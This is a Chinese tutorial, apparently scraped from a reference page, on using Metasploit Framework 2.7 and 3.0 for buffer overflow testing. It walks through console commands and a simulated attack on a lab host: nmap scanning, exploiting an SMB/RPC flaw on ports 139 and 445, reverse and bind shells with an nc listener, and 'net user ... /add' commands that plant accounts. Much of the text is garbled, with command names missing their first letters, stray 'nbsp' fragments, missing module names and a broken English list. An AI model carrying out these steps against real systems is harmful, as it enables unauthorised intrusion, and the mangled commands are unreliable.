Metasploit Framework 缓冲区溢出测试 _编写、测试和使用exploit代码的完善环境

此工具系缓冲区溢出测试的辅助性设备，亦可视作漏洞利用与测试的专用平台。其中汇聚了众多平台上的常见溢出漏洞及流行漏洞，且持续更新，极大地简化了缓冲区溢出测试的过程。

在渗透测试中，安全测试工具扮演着重要角色，它不仅能帮你保存测试日志，还能让你设定每个有效负载在执行完毕后如何自行销毁。特别值得一提的是，这款功能强大的工具完全免费，其开发团队由两位全职成员和几位兼职的贡献者构成。从1.0版本到3.0版本的漏洞自动化探测功能，该工具取得了显著成就，令人赞叹不已！

使用方法播报

以 2.7为例，简述它在命令模式下的使用方法。

安装完毕后，启动程序进行自动更新操作；若无更新内容，程序将提示用户退出。若存在更新，当界面显示“是或否”的选择时，用户需输入“是”以执行更新。

可以直接进入，或者通过在输入框中输入进入框架命令来操作。

可以看到里面有如下的命令：

"?"nbsp; ：获取帮助。

"d"nbsp; :更换当前的工作目录。

"xit"nbsp; :退出。

"elp"nbsp; :获取帮助。

"nfo"nbsp; :显示当前程序的相关信息。

"uit"nbsp; :退出程序。

"eload"nbsp; :再载入和。

"ave"nbsp; :保存当前设置

"etg"nbsp; :设置一个全局环境变量。

"how"nbsp; :显示可用的和。

"se"nbsp; :使用一个。

""nbsp;:显示程序的版本。

例如使用这个漏洞，步骤如下（不唯一）：

展示可供选择的选项，其中以BSD开头的适用于BSD操作系统，以Linx开头的适用于Linux操作系统，而以CMD和WIN开头的则针对系统。

‖ info //查看这个的相关信息

↓ use //使用这个

‖ show //显示这个漏洞利用的参数

设定远程主机地址参数为192.168.1.11，用于指定目标主机的IP地址。

show //显示支持的操作系统类型

set 0 //设置目标为0所代表的那个操作系统类型

展示当前漏洞利用所兼容的有效负载，这实际上就是我们通常所说的，不同系统对于所需条件存在差异。

set //设置有效载荷为执行特定命令

show //显示相关参数

将命令设置为“et user hello world /add”，此操作旨在新增一个用户账户。

set //检查环境设置

check //检查目标是否存在相关漏洞

//检查无误后即可进行溢出了

(4).web模式下使用方法

执行.bat文件，然后在IE浏览器的地址栏输入数字55555，即可展示操作界面。

点击“ ”按钮进入挑选界面，挑选所需选项后，转至基本信息配置页面，该页面的设置与先前所述大同小异，待所有信息配置完毕后，点击

Check检查目标系统是否存在相应的漏洞，点 进行溢出。

最新的3.0版本采用了Ruby编程语言，这种语言以其简洁的代码实现众多功能而闻名。这一事实表明，Ruby正逐渐获得黑客群体的认可，并呈现出一个值得关注的发展趋势。尽管如此，它和...

相较之下或许显得微不足道，然而它确实拥有独特的优势，功能强大且操作简便，对于日常的渗透任务而言，无疑是一款极其实用的工具。当然，你也可以自由地向其中添加你认为有助于你的任何扩展工具包。

3.0主要的目标如下：

of

the of an

code re-use

and

and event recon

to a for edge

其适应能力卓越，平台功能丰富多样，并且具备强大功能和简便易用的特点，这些优势将使其成为行业内的热门经典工具。

|=--------------------------=

2.7的模拟攻击

=--------------------------=|

目标主机：192.168.1.11

1.开虚拟机，用nmap收集目标主机相关信息

要装后才能使用nmap

该系统是平台提供的免费、公共网络接入工具，它能够赋予win32应用程序访问网络底层资源的权限。

使用nmap工具对192.168.1.11进行全端口扫描，并将扫描结果输出至C:\1.txt文件中。

2.目标主机开启了msrpc服务

对应的:

(1).设置为时，为逆向连接。

set LHOST 192.168.1.10

若非处于同一网络段，则需将LHOST配置为公共IP地址，并在对应主机上通过nc工具对指定端口进行监听。

3.端口139，445开放，可利用这个漏洞

不清楚目标操作系统时选择自动

(1).设置为

set USER set PASS

(2).设置为

Bind shell ,对 shell的绑定

(3).设置为

执行命令：设定CMD为"et user /add"，接着设定CMD为"et /add"。